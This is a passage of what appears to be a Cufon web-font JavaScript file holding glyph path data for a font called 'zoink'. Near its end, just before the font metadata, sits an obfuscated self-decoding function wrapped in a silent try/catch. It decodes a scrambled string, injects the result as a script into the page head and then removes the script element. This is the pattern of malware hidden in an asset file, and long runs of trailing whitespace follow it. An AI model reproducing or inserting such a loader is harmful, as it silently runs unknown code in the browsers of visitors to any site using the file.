0,-45,0,-64,4v-4,49,-14,90,-19,137v-15,-35,-46,-55,-79,-29v-49,38,-56,206,27,203v22,-7,33,-30,44,-48v-2,15,-2,30,-2,47v16,1,36,0,48,5xm97,-161v17,36,9,107,-21,122v-38,-9,-23,-142,21,-122","w":185},{"d":"103,-277r-55,-10v0,49,-16,78,-44,101r36,21v34,-25,58,-59,63,-112xm174,-260r-56,-9v1,60,-20,96,-54,123r33,23v43,-29,71,-72,77,-137","w":174},{"d":"21,-134v36,-16,113,-10,116,-53v4,-8,10,-18,15,-24v-33,1,-69,9,-99,14v-14,13,-26,37,-32,63xm140,-140v-33,2,-69,13,-99,18v-13,15,-23,38,-28,65r105,-33v6,-18,10,-38,22,-50","w":163},{"d":"85,-8v-9,-21,-12,-54,-9,-82v52,-24,111,-67,98,-146v-9,-53,-89,-57,-147,-43v-16,84,-20,194,-19,294xm73,-137v3,-29,5,-67,13,-92v45,0,20,56,5,73v-6,6,-12,13,-18,19","w":156},{"d":"217,-184r-52,13v3,-26,7,-50,12,-72r-50,10r-15,79r-38,12r51,-158r-74,21r-44,154r42,50r53,-16r-13,111r61,-17r9,-110v14,-3,28,-8,43,-8","w":212},{"d":"117,-169v-32,8,-73,-1,-83,31v-3,11,-10,21,-13,34r77,-23v5,-15,11,-31,19,-42","w":136},{"d":"49,-180v16,-27,34,-61,69,-54v22,50,-55,77,-79,114v-18,19,-35,47,-43,75v7,19,23,40,31,59v35,-23,86,-37,139,-42r5,-62v-34,0,-69,11,-97,22v17,-65,95,-80,112,-144v21,-79,-101,-92,-146,-44v-14,15,-26,32,-34,53","w":183},{"d":"67,-60v-11,-43,-12,-111,-4,-157r-64,31v3,69,18,137,38,191r66,-27v16,-79,50,-153,92,-206r-71,0v-19,56,-47,104,-57,168","w":156},{"d":"159,-169v35,-12,68,-91,21,-109v-61,-23,-136,12,-153,64v-3,26,13,45,33,52v-42,22,-79,79,-57,138v19,52,125,24,153,-5v22,-23,49,-43,49,-81v0,-30,-20,-52,-46,-59xm141,-221v0,24,-18,40,-43,38v-11,-1,-17,-9,-17,-22v0,-36,60,-62,60,-16xm77,-106v10,-20,63,-48,63,-4v0,38,-28,56,-59,66v-34,2,-17,-49,-4,-62","w":200},{"d":"96,16v41,-55,74,-118,90,-190v14,-66,-16,-125,-84,-113v-70,13,-112,73,-103,163v5,52,61,51,103,22v-18,37,-39,72,-72,95xm101,-229v43,5,13,80,-8,89v-22,19,-47,-8,-35,-36v10,-25,14,-49,43,-53","w":182},{"d":"201,-25v-28,-34,-58,-73,-78,-114v25,-40,61,-74,92,-107r-44,-55v-31,36,-60,79,-88,119r20,-112r-78,21r-11,86r-7,203r62,-19v0,-29,-2,-56,2,-83v25,41,54,73,81,111","w":195},{"d":"116,-188v17,-21,34,-47,59,-59r-15,-43v-46,0,-92,8,-127,18r-15,66v25,-15,46,-24,77,-30v-15,27,-39,41,-59,61r23,40v34,-27,76,4,63,47v-5,16,-18,28,-37,29v-25,1,-41,-17,-57,-30r-38,49v25,42,99,60,142,22v57,-25,67,-167,-16,-170","w":174},{"d":"121,-274r6,124v0,44,-3,89,-29,106v-25,9,-28,-23,-28,-52v0,-55,10,-113,19,-161r-72,21v-26,82,-38,267,79,238v103,-25,110,-171,102,-301","w":190},{"d":"67,26v21,-29,57,-55,84,-75v-11,-23,-25,-45,-32,-71v-15,17,-35,29,-51,45v6,-83,31,-158,64,-215v-35,1,-70,9,-96,19r-20,127v-3,43,-10,87,-7,132v21,10,42,23,58,38","w":146},{"d":"40,-91v-12,33,-28,56,-39,88r33,21v9,-22,23,-36,32,-59r36,55r28,-20v-15,-26,-26,-55,-37,-85v24,-46,54,-80,88,-115v-21,-9,-47,-18,-78,-18v-12,23,-24,40,-34,66v-6,-22,-15,-42,-19,-66v-20,14,-38,26,-51,47v9,34,27,56,41,86","w":153},{"d":"9,-208v-2,29,4,58,34,56v58,-3,78,-51,87,-103v5,-29,-10,-48,-38,-48v-54,0,-79,42,-83,95xm269,-264r-72,-37v-68,93,-131,194,-187,297r45,22v58,-105,128,-205,214,-282xm149,12v63,22,109,-32,112,-93v0,-31,-5,-61,-36,-59v-59,4,-82,54,-92,108v-3,19,5,36,16,44xm70,-199v-4,15,-22,14,-20,-4v4,-30,11,-64,32,-72v14,21,-5,57,-12,76xm197,-93v6,-16,24,-13,22,6v-3,33,-13,69,-35,78v-16,-20,6,-63,13,-84","w":266},{"d":"84,-190v14,-7,29,6,34,17r13,-53v-1,-3,-16,-11,-24,-12r5,-38r-41,-8r-8,46v-38,8,-44,68,-19,96v5,8,14,18,16,28v-6,17,-22,11,-39,-7v-5,17,-9,37,-10,58r30,14v-2,12,-4,31,-8,41r38,9v5,-17,9,-32,11,-52v47,-11,40,-90,9,-113v-6,-9,-12,-12,-7,-26"},{"d":"87,-237v15,-3,14,10,6,19v-26,31,-58,58,-73,99r62,-14v20,-44,75,-64,87,-114v13,-54,-76,-59,-112,-30v-23,19,-41,37,-57,62r27,38v16,-22,31,-54,60,-60xm3,-20v-2,30,31,30,48,13v16,-16,35,-30,33,-64v0,-11,-6,-23,-16,-23v-41,0,-64,30,-65,74","w":131},{"d":"127,48v15,-96,35,-183,75,-259r-61,-8r-10,34v-10,-27,-46,-49,-74,-24v-58,23,-74,143,-27,193v17,19,58,9,67,-8v-8,42,-11,69,-14,115r41,23v13,-26,36,-47,62,-60r-6,-51v-21,10,-39,27,-53,45xm98,-179v18,35,9,110,-14,134v-46,-12,-25,-118,1,-136v5,-3,9,-2,13,2","w":203},{"d":"119,-282v9,78,8,184,-25,234v-30,9,-31,-41,-33,-74r-65,42v14,53,32,92,102,85v96,-10,77,-132,94,-219r9,-80","w":190},{"d":"110,-206v-11,-37,-75,-9,-73,22v-4,18,7,27,25,26v26,0,48,-20,48,-48xm93,-100v0,-37,-63,-22,-71,2v-7,19,-6,46,20,43v24,-3,51,-18,51,-45","w":115},{"d":"13,-202v-15,75,-28,227,71,197v69,-21,62,-124,72,-207r-62,14v0,70,5,112,-18,152v-14,7,-18,-12,-18,-31v1,-51,5,-102,19,-139","w":158},{"d":"198,-285r-81,-24r-102,239r-29,87r47,14r25,-68r43,-92r82,-136v6,-8,10,-14,15,-20","w":151},{"w":97},{"d":"21,-66v1,55,-18,88,-49,112r40,25v37,-28,64,-65,69,-125","w":114},{"d":"62,26v27,-112,70,-216,121,-301r-53,-24v-17,27,-32,66,-47,95v-10,-27,-19,-60,-24,-92r-61,35v13,43,35,89,52,126v-21,43,-36,77,-51,127"},{"d":"172,-190r-8,157v0,18,0,35,1,50r72,-23v-5,-100,0,-212,16,-299r-88,28r-40,119v-8,-47,-1,-100,9,-142r-101,40r-32,117v-6,23,-10,47,-15,71v-5,24,-9,47,-11,70r78,-17v9,-57,6,-122,29,-166v-5,60,0,127,4,184r43,-9v8,-63,21,-131,43,-180","w":251},{"d":"379,-162v-104,-33,-261,-25,-369,-1r-18,97v80,-32,178,-53,290,-54v-71,20,-139,52,-198,85r21,20v68,-40,155,-76,245,-94","w":374},{"d":"132,-39r-36,-36v-8,16,-27,57,-41,23v-3,-9,-3,-20,-1,-35v19,-16,56,-14,87,-18v17,-60,-2,-133,-66,-111v-62,22,-83,118,-63,191v13,45,91,36,109,3xm98,-133r-41,11v3,-26,12,-55,29,-67v17,2,15,38,12,56","w":144},{"d":"151,-1v-12,-46,-7,-115,-3,-165v4,-48,-55,-71,-97,-51v-17,8,-28,26,-38,49r47,14v6,-18,16,-42,35,-45v20,26,-10,68,-40,70v-65,3,-83,118,-16,133v27,6,43,-8,55,-25v-1,10,1,31,3,35xm96,-124v-6,32,1,80,-32,84v-37,-21,1,-82,32,-84","w":158},{"d":"114,-18v46,-26,52,-134,22,-182v-45,-35,-110,9,-117,57v-29,57,-13,185,66,144v8,-4,17,-12,29,-19xm100,-171v9,40,1,100,-17,129v-10,16,-27,3,-27,-15v0,-48,5,-101,34,-118v5,-2,8,-1,10,4","w":165},{"d":"170,-80v32,-41,23,-121,-45,-103v21,-15,45,-40,47,-73v-14,-61,-113,-26,-146,-4r-31,240r51,36v45,-25,93,-57,124,-96xm81,-245v20,-14,43,10,29,31v-8,14,-22,28,-34,38xm75,-142v30,-19,58,13,38,43v-12,17,-29,33,-46,43","w":175},{"d":"67,-152v17,43,29,106,39,156r59,-21r20,-151v9,-47,20,-95,36,-134v-27,-1,-56,1,-81,5r-23,194v-7,-61,-28,-110,-24,-181r-80,35v-10,84,-10,186,-14,276r64,-21v-3,-50,1,-108,4,-158","w":184},{"d":"225,-295r-82,4v-10,38,-15,67,-22,109v-18,3,-27,11,-42,15v4,-38,9,-71,17,-103r-81,10v-8,80,-11,183,-4,266r59,-22r5,-113v16,-7,23,-12,41,-15r-15,163r70,-13v6,-110,18,-221,54,-301","w":192},{"d":"53,-294v1,55,-19,87,-49,112r40,24v37,-28,65,-65,69,-125","w":114},{"d":"85,-71v-10,-60,-19,-119,-11,-187r-82,35r22,111v11,40,23,81,39,118r77,-24v17,-100,48,-196,95,-267r-77,-27v-31,68,-50,154,-60,240","w":174},{"d":"96,-68r-6,81r82,-9v-9,-93,-9,-204,-6,-303v-34,3,-71,2,-99,11r-70,190r-26,88r72,-1v4,-18,5,-32,10,-49v12,-4,29,-9,43,-8xm107,-216v1,38,-6,83,-7,123r-36,3v17,-38,24,-89,43,-126","w":182},{"d":"38,-127v17,-22,87,-40,89,8v2,51,-62,70,-101,41r-31,52v27,34,112,38,145,4v55,-33,76,-183,-18,-186v-22,-1,-38,2,-56,10r2,-22v22,-14,52,-20,86,-27r4,-47v-50,5,-96,22,-132,41r-21,95","w":170},{"d":"122,-50v14,-13,20,-40,4,-52v23,-19,31,-44,21,-80v4,-10,16,-17,19,-2v1,4,1,9,1,15r28,-22v0,-22,-18,-52,-37,-33v-8,8,-17,21,-22,34v-55,-42,-161,18,-135,97v10,32,68,24,95,9v10,5,17,21,8,34v-73,-2,-124,16,-140,67v-23,74,105,66,155,41v36,-18,66,-76,22,-100v-6,-3,-13,-6,-19,-8xm49,-96v-13,-35,16,-75,44,-83v22,19,-19,64,-30,80v-5,6,-10,7,-14,3xm42,-8v12,-16,56,-27,54,6v-2,37,-27,63,-63,60v-28,-13,-1,-53,9,-66","w":183},{"d":"92,-36v-31,-54,-17,-176,25,-207v21,-4,15,33,17,57r65,-46v4,-77,-96,-55,-136,-26v-34,25,-52,66,-54,121v-3,84,26,177,110,143v55,-22,78,-90,76,-169r-89,25r-5,41r31,-8v-4,29,-16,60,-40,69","w":202}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+292-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("f5L}#Y)`jZ4XfOo0MY7sA5A42l)}LY4X2lusjZK*Lz:QE%`=)YA~BYomj5&(A(3yKwRtjg4.ZYQ.,`L`zSM3zPz~,o7,M(a~E(aS#oTYxgg&L7~=rza`B(ulkmoB$}z$WOxgrS7fk*z,BsaQZx}]LZ7+UgtAu}Lv)ZMwA=t%,5&RMOy=A=gQj(`~Bwa4E=t~B5~4,OtQLZtavOmP75wAufB$)krUKb(xzZ2ELj#,MW]yT=.goY*!R8;Q3X+~&s%`}lS[tD0:4|{*M5yQL%}=BYEXLl&t,5T%r234kloYf5AX#lQ4B}[!r%RSMSM,B=g{fm:DW*v.#z~X#Y&:,Y4}Ll4+,o~XL2xRuO4RB*Ko,SU!#54.E2KR#l[Xj54%M5tT#ZxRfZL+,=y0j(&QksQ;jbo*Zl)#jz}Mr2v#jz}4fbyR")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":142,"face":{"font-family":"zoink","font-weight":500,"font-stretch":"normal","units-per-em":"360","panose-1":"2 0 6 6 2 0 0 2 0 4","ascent":"288","descent":"-72","x-height":"1","cap-height":"5","bbox":"-77 -320 379 114","underline-thickness":"18","underline-position":"-27","unicode-range":"U+0020-U+007A"}}));
																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																												
																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																												
